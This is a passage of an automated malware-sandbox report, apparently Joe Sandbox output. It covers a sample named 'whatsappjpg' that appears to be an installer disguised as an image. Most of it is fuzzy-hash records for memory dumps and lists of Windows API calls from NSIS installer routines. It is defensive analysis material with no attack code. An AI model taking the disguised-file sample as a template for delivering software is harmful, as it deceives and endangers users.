                                                      • Opcode Fuzzy Hash: 4e123a6cd77b14fbec0883805ae0d463ba7c283fac75a4e36fe5e55487471138
                                                      • Instruction Fuzzy Hash: 0E218139B011549BEF04DA6DE96169DB7F7EFC4360F248429D405EB352DB35EC428B90
                                                      Memory Dump Source
                                                      • Source File: 00000008.00000002.3819207502.0000000000160000.00000040.00000800.00020000.00000000.sdmp, Offset: 00160000, based on PE: false
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_8_2_160000_whatsappjpg.jbxd
                                                      Similarity
                                                      • API ID:
                                                      • String ID:
                                                      • API String ID:
                                                      • Opcode ID: 50dc3a6b32ff5c0067aea8aef9a7387371deef07ab86d27de0a4316811488b9d
                                                      • Instruction ID: 8958341a653c17c4458ffe31ddc0bc75b2a946318da087abf28fb945d85000b2
                                                      • Opcode Fuzzy Hash: 50dc3a6b32ff5c0067aea8aef9a7387371deef07ab86d27de0a4316811488b9d
                                                      • Instruction Fuzzy Hash: B2113D30F002084BDF66DB79CC4476A3359EB8D354F218979E006DF251DB25DDA68BD2
                                                      Memory Dump Source
                                                      • Source File: 00000008.00000002.3819207502.0000000000160000.00000040.00000800.00020000.00000000.sdmp, Offset: 00160000, based on PE: false
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_8_2_160000_whatsappjpg.jbxd
                                                      Similarity
                                                      • API ID:
                                                      • String ID:
                                                      • API String ID:
                                                      • Opcode ID: 39865ba16c5922a0ae338277c28f633b7d7cf136e566ee75c8ca42094589bec9
                                                      • Instruction ID: bddd19af34602f0d5c4ca9c662a4b134e5ca62bff3bbb5657a7a73864349d9e8
                                                      • Opcode Fuzzy Hash: 39865ba16c5922a0ae338277c28f633b7d7cf136e566ee75c8ca42094589bec9
                                                      • Instruction Fuzzy Hash: 7811E576F00200AFCF509BB89C0869E7BF9FB99350B18453AE906E3340EB348D528791
                                                      Memory Dump Source
                                                      • Source File: 00000008.00000002.3845952269.00000000394D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 394D0000, based on PE: false
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_8_2_394d0000_whatsappjpg.jbxd
                                                      Similarity
                                                      • API ID:
                                                      • String ID:
                                                      • API String ID:
                                                      • Opcode ID: b61053bf6b0dce79d11769b1bd0475d5f5d3592df45abda0a722522a9e63aeac
                                                      • Instruction ID: e4af2830d90aa4cd7d70a40ace638241ce88cf5a4229bb96a7d1225f7959dbef
                                                      • Opcode Fuzzy Hash: b61053bf6b0dce79d11769b1bd0475d5f5d3592df45abda0a722522a9e63aeac
                                                      • Instruction Fuzzy Hash: 26116536B001288BDB459A6CCC246AE77F6ABC9751F148539D405E7354DE25EC028BA1
                                                      Memory Dump Source
                                                      • Source File: 00000008.00000002.3819207502.0000000000160000.00000040.00000800.00020000.00000000.sdmp, Offset: 00160000, based on PE: false
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_8_2_160000_whatsappjpg.jbxd
                                                      Similarity
                                                      • API ID:
                                                      • String ID:
                                                      • API String ID:
                                                      • Opcode ID: b6f528fe770ddc4a6fd7473008a8157b3366310f45e3344f3d644cbb91deb303
                                                      • Instruction ID: 227359c1cdcf2cc04213403c205fcbe4c565b186e9facf8b62f924a867a47eda
                                                      • Opcode Fuzzy Hash: b6f528fe770ddc4a6fd7473008a8157b3366310f45e3344f3d644cbb91deb303
                                                      • Instruction Fuzzy Hash: 5701D232B093100FCB159B794C5456E6FE7AF84724309447AC805CB2A2FF70CC0187A1
                                                      Memory Dump Source
                                                      • Source File: 00000008.00000002.3819207502.0000000000160000.00000040.00000800.00020000.00000000.sdmp, Offset: 00160000, based on PE: false
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_8_2_160000_whatsappjpg.jbxd
                                                      Similarity
                                                      • API ID:
                                                      • String ID:
                                                      • API String ID:
                                                      • Opcode ID: fa842adb6a4b55966cf344586fcf37d7ca6de54836aa7e7d4752d68c18f881d3
                                                      • Instruction ID: dccd8a29988bfc60ebfd6890f2d52dcc18404eb7741ec560c30b152f06c419b0
                                                      • Opcode Fuzzy Hash: fa842adb6a4b55966cf344586fcf37d7ca6de54836aa7e7d4752d68c18f881d3
                                                      • Instruction Fuzzy Hash: 06017C327005204FDB25A678A89476AB7E2DBCE710F2488BEE10BCB351DB25DD574391
                                                      Memory Dump Source
                                                      • Source File: 00000008.00000002.3845952269.00000000394D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 394D0000, based on PE: false
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_8_2_394d0000_whatsappjpg.jbxd
                                                      Similarity
                                                      • API ID:
                                                      • String ID:
                                                      • API String ID:
                                                      • Opcode ID: f4fba042ffbd5bacb88cfcd8fc75f881daa91b475dcbbeb482dc66e28a0a5aef
                                                      • Instruction ID: 93cbbd316de82eb3471bda2cf913e80b1204cc6c3e5fb51419252ac56589f1da
                                                      • Opcode Fuzzy Hash: f4fba042ffbd5bacb88cfcd8fc75f881daa91b475dcbbeb482dc66e28a0a5aef
                                                      • Instruction Fuzzy Hash: 5221EEB5D01659AFDB00DFAAD880ADEFFB4FF49310F10812AE918A7641C374A940CBA5
                                                      Memory Dump Source
                                                      • Source File: 00000008.00000002.3819207502.0000000000160000.00000040.00000800.00020000.00000000.sdmp, Offset: 00160000, based on PE: false
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_8_2_160000_whatsappjpg.jbxd
                                                      Similarity
                                                      • API ID:
                                                      • String ID:
                                                      • API String ID:
                                                      • Opcode ID: d1b5b1ce575a2b57cf140faba3d9577a5e06f84c1d8b353428aadad861a1b302
                                                      • Instruction ID: 3f9f5131f79bff6acf83843cef3fe24d66b55ed60d0a0f0489868904c4430438
                                                      • Opcode Fuzzy Hash: d1b5b1ce575a2b57cf140faba3d9577a5e06f84c1d8b353428aadad861a1b302
                                                      • Instruction Fuzzy Hash: 1A016D31A012159FCB21EFB888511AEBBF5EF89325F2504B9D805E7201EB31C8518BE1
                                                      Memory Dump Source
                                                      • Source File: 00000008.00000002.3845952269.00000000394D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 394D0000, based on PE: false
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_8_2_394d0000_whatsappjpg.jbxd
                                                      Similarity
                                                      • API ID:
                                                      • String ID:
                                                      • API String ID:
                                                      • Opcode ID: b8c514e95b7af24fc7029f0ed162e7e2baf0964485c8cce61e936626b7fa76a5
                                                      • Instruction ID: 518ebb675a1d4ce9ace5ae4bcc43064bbd1eac5f6ac84f5ab238573683312d59
                                                      • Opcode Fuzzy Hash: b8c514e95b7af24fc7029f0ed162e7e2baf0964485c8cce61e936626b7fa76a5
                                                      • Instruction Fuzzy Hash: B101B139B01550CFD702DA7CC862B5AB7E1EB89750F10847DE04BD7752EA26ED468B90
                                                      Memory Dump Source
                                                      • Source File: 00000008.00000002.3818944174.00000000000AD000.00000040.00000800.00020000.00000000.sdmp, Offset: 000AD000, based on PE: false
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_8_2_ad000_whatsappjpg.jbxd
                                                      Similarity
                                                      • API ID:
                                                      • String ID:
                                                      • API String ID:
                                                      • Opcode ID: 3f4675e99f22990077d7ca64c846758c7cedafdaf71502d2a3914074f32ea8d3
                                                      • Instruction ID: d0242c391ee65fa870e3c65eb1794f37d0e1cd28d69e756a90e639c5c260a0db
                                                      • Opcode Fuzzy Hash: 3f4675e99f22990077d7ca64c846758c7cedafdaf71502d2a3914074f32ea8d3
                                                      • Instruction Fuzzy Hash: CE119075504280DFCB15CF54D5C4B15FBA2FB85314F24C6AAD84A4BA56C33AD84ACB62
                                                      Memory Dump Source
                                                      • Source File: 00000008.00000002.3845952269.00000000394D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 394D0000, based on PE: false
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_8_2_394d0000_whatsappjpg.jbxd
                                                      Similarity
                                                      • API ID:
                                                      • String ID:
                                                      • API String ID:
                                                      • Opcode ID: 6132d22404c88893bf3266f46361f20e565b9ddb7a91b30b591d2488e851b430
                                                      • Instruction ID: 9d1bd54affb5b0eeb885093a208cb0bd9802a1b74296b3c60bac7748b8a2b408
                                                      • Opcode Fuzzy Hash: 6132d22404c88893bf3266f46361f20e565b9ddb7a91b30b591d2488e851b430
                                                      • Instruction Fuzzy Hash: D701243AB001189BDB148A6CCC606EF77F7ABC9380F14413EC405E7354DA2598038BA1
                                                      Memory Dump Source
                                                      • Source File: 00000008.00000002.3845952269.00000000394D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 394D0000, based on PE: false
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_8_2_394d0000_whatsappjpg.jbxd
                                                      Similarity
                                                      • API ID:
                                                      • String ID:
                                                      • API String ID:
                                                      • Opcode ID: 2a9a88c840632436c493048f375d894255689ffbb858c202cf9b3b891b6b1785
                                                      • Instruction ID: a9bea426a2f284a36af55aab45b0b494629e6b029dae9eb46f0d7dfff372bedd
                                                      • Opcode Fuzzy Hash: 2a9a88c840632436c493048f375d894255689ffbb858c202cf9b3b891b6b1785
                                                      • Instruction Fuzzy Hash: DE11DDB5D01219AFCB00DF9AD884ADEFBB4FF49310F10812AE918A7340C374A944CBA5
                                                      Memory Dump Source
                                                      • Source File: 00000008.00000002.3845952269.00000000394D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 394D0000, based on PE: false
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_8_2_394d0000_whatsappjpg.jbxd
                                                      Similarity
                                                      • API ID:
                                                      • String ID:
                                                      • API String ID:
                                                      • Opcode ID: b131bbff6c5fd068d6e675c70a3c21fada91d5eca18101311975c570f6a194e9
                                                      • Instruction ID: 247cb83de83a29ec6441e1124ad5d4d77d1e2fd47498d3e5c0cdea412d870951
                                                      • Opcode Fuzzy Hash: b131bbff6c5fd068d6e675c70a3c21fada91d5eca18101311975c570f6a194e9
                                                      • Instruction Fuzzy Hash: 4601D1387000104BE711996DC666B1FB7DADBC8790F20843EE40AC7382DE75EC0243A1
                                                      Memory Dump Source
                                                      • Source File: 00000008.00000002.3819207502.0000000000160000.00000040.00000800.00020000.00000000.sdmp, Offset: 00160000, based on PE: false
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_8_2_160000_whatsappjpg.jbxd
                                                      Similarity
                                                      • API ID:
                                                      • String ID:
                                                      • API String ID:
                                                      • Opcode ID: 552c7c750bbc15ce42474247e725969f85432f4e87b117550ddd22fd74662772
                                                      • Instruction ID: 3400df0270bee6e3f51323726eebb41d92887db0a0f7188702d3f2fd4eb08433
                                                      • Opcode Fuzzy Hash: 552c7c750bbc15ce42474247e725969f85432f4e87b117550ddd22fd74662772
                                                      • Instruction Fuzzy Hash: D8018132B093104BDB14AFB98C5853E7AEBAFC8B65355843AD909CB261FF71CC4186A1
                                                      Memory Dump Source
                                                      • Source File: 00000008.00000002.3819207502.0000000000160000.00000040.00000800.00020000.00000000.sdmp, Offset: 00160000, based on PE: false
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_8_2_160000_whatsappjpg.jbxd
                                                      Similarity
                                                      • API ID:
                                                      • String ID:
                                                      • API String ID:
                                                      • Opcode ID: 5b208c1eb582dca4d18be896ee5b98f61c3728bfc9943e3e828f284797128791
                                                      • Instruction ID: 582fb747172f07b8b2522a3bb56ae0e392ce91f2cdd0adccf07c2b123c9660dd
                                                      • Opcode Fuzzy Hash: 5b208c1eb582dca4d18be896ee5b98f61c3728bfc9943e3e828f284797128791
                                                      • Instruction Fuzzy Hash: C80119327005205BDA25966DA891B3BB7D6DBCAB24F20887DF50AD7341DF26EC134395
                                                      Memory Dump Source
                                                      • Source File: 00000008.00000002.3819207502.0000000000160000.00000040.00000800.00020000.00000000.sdmp, Offset: 00160000, based on PE: false
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_8_2_160000_whatsappjpg.jbxd
                                                      Similarity
                                                      • API ID:
                                                      • String ID:
                                                      • API String ID:
                                                      • Opcode ID: 1d0a401f975ba09e55ae999dde6ec555ca41999efc30957870cf3db086bf53ff
                                                      • Instruction ID: c0236c62c6b889a18993ea419e64de93dac4a8893b6856ffad03519ea3bd4a2e
                                                      • Opcode Fuzzy Hash: 1d0a401f975ba09e55ae999dde6ec555ca41999efc30957870cf3db086bf53ff
                                                      • Instruction Fuzzy Hash: 9201F272B042448FD715A7B984246AE7FE2EFCA300F10806ED046DB392DF758C459BA2
                                                      Memory Dump Source
                                                      • Source File: 00000008.00000002.3845952269.00000000394D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 394D0000, based on PE: false
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_8_2_394d0000_whatsappjpg.jbxd
                                                      Similarity
                                                      • API ID:
                                                      • String ID:
                                                      • API String ID:
                                                      • Opcode ID: 828cb5cb64047cb27d90c0c4c070bd5cef660a7f73496d4570b4194ed34b3054
                                                      • Instruction ID: 4d965e0f648b2fa1e4e32fb8f1f004580e578a9081ad412f44b64e39365dc4f7
                                                      • Opcode Fuzzy Hash: 828cb5cb64047cb27d90c0c4c070bd5cef660a7f73496d4570b4194ed34b3054
                                                      • Instruction Fuzzy Hash: F801AF39B001108FE705DA7CC862B5BB7E6DB89750F508829E40BD7752EE26FD068790
                                                      Memory Dump Source
                                                      • Source File: 00000008.00000002.3819207502.0000000000160000.00000040.00000800.00020000.00000000.sdmp, Offset: 00160000, based on PE: false
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_8_2_160000_whatsappjpg.jbxd
                                                      Similarity
                                                      • API ID:
                                                      • String ID:
                                                      • API String ID:
                                                      • Opcode ID: 4b8b75b7b04d154b3977a2f77896af8211a3fc8f1239b09acf17551655b10140
                                                      • Instruction ID: d37064b87a2e1f001f2c81f38c0d8f2577ae411f319f28c5ed71786ac276c857
                                                      • Opcode Fuzzy Hash: 4b8b75b7b04d154b3977a2f77896af8211a3fc8f1239b09acf17551655b10140
                                                      • Instruction Fuzzy Hash: 32012D70B042149FD744EF784C023BE7BA59B46318F24846ADA05EB3C2E736C9128794
                                                      Memory Dump Source
                                                      • Source File: 00000008.00000002.3845952269.00000000394D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 394D0000, based on PE: false
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_8_2_394d0000_whatsappjpg.jbxd
                                                      Similarity
                                                      • API ID:
                                                      • String ID:
                                                      • API String ID:
                                                      • Opcode ID: 80e5117e66d1f4e34cdcf3b7773f8a74bfa3667aa92435f6bcc47bce3283685d
                                                      • Instruction ID: 30e8c7ec527a3437801836641e7b3a3c1600dd6caa0504b456431f20d6baf848
                                                      • Opcode Fuzzy Hash: 80e5117e66d1f4e34cdcf3b7773f8a74bfa3667aa92435f6bcc47bce3283685d
                                                      • Instruction Fuzzy Hash: F3012D35B203249BDB149A64D86298E7376FB89354F10457AE405E7342DB31FC05C790
                                                      Memory Dump Source
                                                      • Source File: 00000008.00000002.3819207502.0000000000160000.00000040.00000800.00020000.00000000.sdmp, Offset: 00160000, based on PE: false
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_8_2_160000_whatsappjpg.jbxd
                                                      Similarity
                                                      • API ID:
                                                      • String ID:
                                                      • API String ID:
                                                      • Opcode ID: 85ca3bbf66f4f9bf4dfe55613f339e9efaa7afc45e3684fe4fde45a9108f9c7f
                                                      • Instruction ID: ef1fd7ae45aa069efece11798ef38a6bd7f8816a3bdfda17e7a624ed746096f8
                                                      • Opcode Fuzzy Hash: 85ca3bbf66f4f9bf4dfe55613f339e9efaa7afc45e3684fe4fde45a9108f9c7f
                                                      • Instruction Fuzzy Hash: 26F0F43131C11397E7241A79BC383763598EF20741F1554F6B826D56D0EF59DCE09252
                                                      Memory Dump Source
                                                      • Source File: 00000008.00000002.3845952269.00000000394D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 394D0000, based on PE: false
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_8_2_394d0000_whatsappjpg.jbxd
                                                      Similarity
                                                      • API ID:
                                                      • String ID:
                                                      • API String ID:
                                                      • Opcode ID: 45c284b038c7d910f7a4f562de9e34b72cc421109129bc7bc56b29e1a7790684
                                                      • Instruction ID: c56d1e1c377448810ef7d46edbf7d553f7dfb3247ac0a69d5e431a5183d45ba0
                                                      • Opcode Fuzzy Hash: 45c284b038c7d910f7a4f562de9e34b72cc421109129bc7bc56b29e1a7790684
                                                      • Instruction Fuzzy Hash: E0F0A73AE002598BEB248AA9D46578BB7A9D7457A0F004437E90AE7341D631E80587A1
                                                      Memory Dump Source
                                                      • Source File: 00000008.00000002.3845952269.00000000394D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 394D0000, based on PE: false
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_8_2_394d0000_whatsappjpg.jbxd
                                                      Similarity
                                                      • API ID:
                                                      • String ID:
                                                      • API String ID:
                                                      • Opcode ID: aba3644a153f1c60882d3bd29c6bf04dd2b5b0487fedef3aea1f904cc8f35c47
                                                      • Instruction ID: b0acc23cf84f8ad68889b6d467c8e3e747e108ba69e567050e479a64d37df6ec
                                                      • Opcode Fuzzy Hash: aba3644a153f1c60882d3bd29c6bf04dd2b5b0487fedef3aea1f904cc8f35c47
                                                      • Instruction Fuzzy Hash: BBF0A77E704356DBAB148D4299712647761AB443A0F4040A7E900A7243EB75EA02C7A0
                                                      Memory Dump Source
                                                      • Source File: 00000008.00000002.3845952269.00000000394D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 394D0000, based on PE: false
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_8_2_394d0000_whatsappjpg.jbxd
                                                      Similarity
                                                      • API ID:
                                                      • String ID:
                                                      • API String ID:
                                                      • Opcode ID: a63f16db1c26bcdb57bf267823ed954759831d4eaa95da598e98fc41ee38d53a
                                                      • Instruction ID: 8ac3780160910cb3278d2581bf76c3d34a658492bc432c7558b44a5da3e369f0
                                                      • Opcode Fuzzy Hash: a63f16db1c26bcdb57bf267823ed954759831d4eaa95da598e98fc41ee38d53a
                                                      • Instruction Fuzzy Hash: 71F0FE74A10119DFDB14DF94D969BAEBBB2FF84B04F604119E002A7395CB751C45CF90
                                                      APIs
                                                      • GetDlgItem.USER32(?,000003F9), ref: 00404B26
                                                      • GetDlgItem.USER32(?,00000408), ref: 00404B31
                                                      • GlobalAlloc.KERNEL32(00000040,?), ref: 00404B7B
                                                      • LoadBitmapW.USER32(0000006E), ref: 00404B8E
                                                      • SetWindowLongW.USER32(?,000000FC,00405106), ref: 00404BA7
                                                      • ImageList_Create.COMCTL32(00000010,00000010,00000021,00000006,00000000), ref: 00404BBB
                                                      • ImageList_AddMasked.COMCTL32(00000000,00000000,00FF00FF), ref: 00404BCD
                                                      • SendMessageW.USER32(?,00001109,00000002), ref: 00404BE3
                                                      • SendMessageW.USER32(?,0000111C,00000000,00000000), ref: 00404BEF
                                                      • SendMessageW.USER32(?,0000111B,00000010,00000000), ref: 00404C01
                                                      • DeleteObject.GDI32(00000000), ref: 00404C04
                                                      • SendMessageW.USER32(?,00000143,00000000,00000000), ref: 00404C2F
                                                      • SendMessageW.USER32(?,00000151,00000000,00000000), ref: 00404C3B
                                                      • SendMessageW.USER32(?,00001132,00000000,?), ref: 00404CD1
                                                      • SendMessageW.USER32(?,0000110A,00000003,00000000), ref: 00404CFC
                                                      • SendMessageW.USER32(?,00001132,00000000,?), ref: 00404D10
                                                      • GetWindowLongW.USER32(?,000000F0), ref: 00404D3F
                                                      • SetWindowLongW.USER32(?,000000F0,00000000), ref: 00404D4D
                                                      • ShowWindow.USER32(?,00000005), ref: 00404D5E
                                                      • SendMessageW.USER32(?,00000419,00000000,?), ref: 00404E5B
                                                      • SendMessageW.USER32(?,00000147,00000000,00000000), ref: 00404EC0
                                                      • SendMessageW.USER32(?,00000150,00000000,00000000), ref: 00404ED5
                                                      • SendMessageW.USER32(?,00000420,00000000,00000020), ref: 00404EF9
                                                      • SendMessageW.USER32(?,00000200,00000000,00000000), ref: 00404F19
                                                      • ImageList_Destroy.COMCTL32(?), ref: 00404F2E
                                                      • GlobalFree.KERNEL32(?), ref: 00404F3E
                                                      • SendMessageW.USER32(?,0000014E,00000000,00000000), ref: 00404FB7
                                                      • SendMessageW.USER32(?,00001102,?,?), ref: 00405060
                                                      • SendMessageW.USER32(?,0000113F,00000000,00000008), ref: 0040506F
                                                      • InvalidateRect.USER32(?,00000000,?), ref: 0040508F
                                                      • ShowWindow.USER32(?,00000000), ref: 004050DD
                                                      • GetDlgItem.USER32(?,000003FE), ref: 004050E8
                                                      • ShowWindow.USER32(00000000), ref: 004050EF
                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 00000008.00000002.3819316110.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                      • Associated: 00000008.00000002.3819297127.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000008.00000002.3819334099.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000008.00000002.3819353074.0000000000409000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000008.00000002.3819377085.0000000000454000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_8_2_400000_whatsappjpg.jbxd
                                                      Similarity
                                                      • API ID: MessageSend$Window$ImageItemList_LongShow$Global$AllocBitmapCreateDeleteDestroyFreeInvalidateLoadMaskedObjectRect
                                                      • String ID: $M$N
                                                      • API String ID: 1638840714-813528018
                                                      • Opcode ID: 76a51ec3fa87313c88060479e11805ee9570431e44e9bc5a31b06844deabf825
                                                      • Instruction ID: 29e4c212ffdeb16812bd97cb13f1a8c590c5d02c92ec483b1b79380362aa6ea4
                                                      • Opcode Fuzzy Hash: 76a51ec3fa87313c88060479e11805ee9570431e44e9bc5a31b06844deabf825
                                                      • Instruction Fuzzy Hash: 88026FB0A00209EFEB209F54DD85AAE7BB5FB84314F10817AF610B62E1C7799D52CF58
                                                      APIs
                                                      • #17.COMCTL32 ref: 00403377
                                                      • SetErrorMode.KERNEL32(00008001), ref: 00403382
                                                      • OleInitialize.OLE32(00000000), ref: 00403389
                                                        • Part of subcall function 00406252: GetModuleHandleA.KERNEL32(?,?,00000020,0040339B,00000008), ref: 00406264
                                                        • Part of subcall function 00406252: LoadLibraryA.KERNEL32(?,?,00000020,0040339B,00000008), ref: 0040626F
                                                        • Part of subcall function 00406252: GetProcAddress.KERNEL32(00000000,?), ref: 00406280
                                                      • SHGetFileInfoW.SHELL32(00420690,00000000,?,000002B4,00000000), ref: 004033B1
                                                        • Part of subcall function 00405EE8: lstrcpynW.KERNEL32(?,?,00000400,004033C6,004281E0,NSIS Error), ref: 00405EF5
                                                      • GetCommandLineW.KERNEL32(004281E0,NSIS Error), ref: 004033C6
                                                      • GetModuleHandleW.KERNEL32(00000000,00434000,00000000), ref: 004033D9
                                                      • CharNextW.USER32(00000000,00434000,00000020), ref: 00403400
                                                      • GetTempPathW.KERNEL32(00000400,00436800,00000000,00000020), ref: 00403509
                                                      • GetWindowsDirectoryW.KERNEL32(00436800,000003FB), ref: 0040351A
                                                      • lstrcatW.KERNEL32(00436800,\Temp), ref: 00403526
                                                      • GetTempPathW.KERNEL32(000003FC,00436800,00436800,\Temp), ref: 0040353A
                                                      • lstrcatW.KERNEL32(00436800,Low), ref: 00403542
                                                      • SetEnvironmentVariableW.KERNEL32(TEMP,00436800,00436800,Low), ref: 00403553
                                                      • SetEnvironmentVariableW.KERNEL32(TMP,00436800), ref: 0040355B
                                                      • DeleteFileW.KERNEL32(00436000), ref: 0040356F
                                                      • OleUninitialize.OLE32(?), ref: 0040361F
                                                      • ExitProcess.KERNEL32 ref: 0040363F
                                                      • lstrcatW.KERNEL32(00436800,~nsu.tmp,00434000,00000000,?), ref: 0040364B
                                                      • lstrcmpiW.KERNEL32(00436800,00435800,00436800,~nsu.tmp,00434000,00000000,?), ref: 00403657
                                                      • CreateDirectoryW.KERNEL32(00436800,00000000), ref: 00403663
                                                      • SetCurrentDirectoryW.KERNEL32(00436800), ref: 0040366A
                                                      • DeleteFileW.KERNEL32(0041FE90,0041FE90,?,0042A000,?), ref: 004036C4
                                                      • CopyFileW.KERNEL32(00437800,0041FE90,?), ref: 004036D8
                                                      • CloseHandle.KERNEL32(00000000,0041FE90,0041FE90,?,0041FE90,00000000), ref: 00403705
                                                      • GetCurrentProcess.KERNEL32(00000028,00000004,00000005,00000004,00000003), ref: 0040375B
                                                      • ExitWindowsEx.USER32(00000002,00000000), ref: 00403797
                                                      • ExitProcess.KERNEL32 ref: 004037BA
                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 00000008.00000002.3819316110.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                      • Associated: 00000008.00000002.3819297127.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000008.00000002.3819334099.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000008.00000002.3819353074.0000000000409000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000008.00000002.3819377085.0000000000454000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_8_2_400000_whatsappjpg.jbxd
                                                      Similarity
                                                      • API ID: File$DirectoryExitHandleProcesslstrcat$CurrentDeleteEnvironmentModulePathTempVariableWindows$AddressCharCloseCommandCopyCreateErrorInfoInitializeLibraryLineLoadModeNextProcUninitializelstrcmpilstrcpyn
                                                      • String ID: Error launching installer$Error writing temporary file. Make sure your temp folder is valid.$Low$NSIS Error$SeShutdownPrivilege$TEMP$TMP$\Temp$~nsu.tmp
                                                      • API String ID: 4107622049-1875889550
                                                      • Opcode ID: b8fba2d3f2b1c611e22a85b6af37489a6fd7a8924b7a7b1bf72e15cfe01e73cf
                                                      • Instruction ID: d10961c3cf085e12fbe59355e5df5276e8fc63a686dc482ac58f4e9f7edec25e
                                                      • Opcode Fuzzy Hash: b8fba2d3f2b1c611e22a85b6af37489a6fd7a8924b7a7b1bf72e15cfe01e73cf
                                                      • Instruction Fuzzy Hash: 8CB1E070904211AAD720BF629D49A3B3EACEB45706F40453FF542B62E2D77C5A41CB7E
                                                      APIs
                                                      • DeleteFileW.KERNEL32(?,?,00436800,76F92EE0,00434000), ref: 00405799
                                                      • lstrcatW.KERNEL32(004246D8,\*.*,004246D8,?,?,00436800,76F92EE0,00434000), ref: 004057E1
                                                      • lstrcatW.KERNEL32(?,00409014,?,004246D8,?,?,00436800,76F92EE0,00434000), ref: 00405804
                                                      • lstrlenW.KERNEL32(?,?,00409014,?,004246D8,?,?,00436800,76F92EE0,00434000), ref: 0040580A
                                                      • FindFirstFileW.KERNEL32(004246D8,?,?,?,00409014,?,004246D8,?,?,00436800,76F92EE0,00434000), ref: 0040581A
                                                      • FindNextFileW.KERNEL32(00000000,00000010,000000F2,?,?,?,?,0000002E), ref: 004058BA
                                                      • FindClose.KERNEL32(00000000), ref: 004058C9
                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 00000008.00000002.3819316110.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                      • Associated: 00000008.00000002.3819297127.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000008.00000002.3819334099.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000008.00000002.3819353074.0000000000409000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000008.00000002.3819377085.0000000000454000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_8_2_400000_whatsappjpg.jbxd
                                                      Similarity
                                                      • API ID: FileFind$lstrcat$CloseDeleteFirstNextlstrlen
                                                      • String ID: \*.*
                                                      • API String ID: 2035342205-1173974218
                                                      • Opcode ID: f101a222198de3598bef61ef3d06d471c43b44ecc91151dca5712a762e0b7e66
                                                      • Instruction ID: ac1757c2d801c66fd25662a47f0a2b95df28272739e9ed83f1af15967125822e
                                                      • Opcode Fuzzy Hash: f101a222198de3598bef61ef3d06d471c43b44ecc91151dca5712a762e0b7e66
                                                      • Instruction Fuzzy Hash: D541B132800A14F6DB217B659C49AAF76B8DF41724F20817BF801B21D1D77C4D92DE6E
                                                      Memory Dump Source
                                                      • Source File: 00000008.00000002.3819316110.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                      • Associated: 00000008.00000002.3819297127.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000008.00000002.3819334099.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000008.00000002.3819353074.0000000000409000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000008.00000002.3819377085.0000000000454000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_8_2_400000_whatsappjpg.jbxd
                                                      Similarity
                                                      • API ID:
                                                      • String ID:
                                                      • API String ID:
                                                      • Opcode ID: a15f429ebeef9cdec0e0a946c982a144c1606cedce27df8dc8c79f03dc168eda
